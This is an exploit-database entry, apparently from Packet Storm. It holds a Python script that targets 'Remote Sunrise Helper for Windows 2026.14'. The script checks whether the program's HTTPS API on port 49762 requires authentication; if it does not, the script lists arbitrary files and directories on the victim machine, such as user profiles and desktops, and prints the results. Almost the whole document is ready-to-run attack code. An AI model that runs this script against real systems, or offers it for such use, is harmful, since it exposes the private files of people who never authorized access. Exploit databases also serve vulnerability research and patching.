Share
## https://sploitus.com/exploit?id=PACKETSTORM:219206
#!/usr/bin/env python3
    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
    Unauthenticated File/Directory Listing
    # Date: 2026-04-20
    # Exploit Author: Chokri Hammedi
    # Software: https://rs.ltd/latest.php?os=win
    # Vendor: https://rs.ltd/
    # Version: 2026.14
    # Tested on: Windows 10 / Windows 11
    
    import requests, json, sys, urllib3
    from urllib.parse import quote
    urllib3.disable_warnings()
    
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [path]")
        print(f"Example: {sys.argv[0]} 192.168.1.103")
        print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'")
        print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'")
        sys.exit(1)
    
    target = sys.argv[1]
    path = sys.argv[2] if len(sys.argv) > 2 else ""
    url = f"https://{target}:49762"
    headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
    
    r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
    data = r.json()
    
    if data.get("requires.auth") == False:
        if path:
            encoded = quote(path, safe='')
            r = requests.get(f"{url}/api/listFiles={encoded}", headers=headers,
    verify=False)
        else:
            r = requests.get(f"{url}/api/listFiles", headers=headers,
    verify=False)
        print(json.dumps(r.json(), indent=2))
    else:
        print("[*] Not vulnerable - authentication required")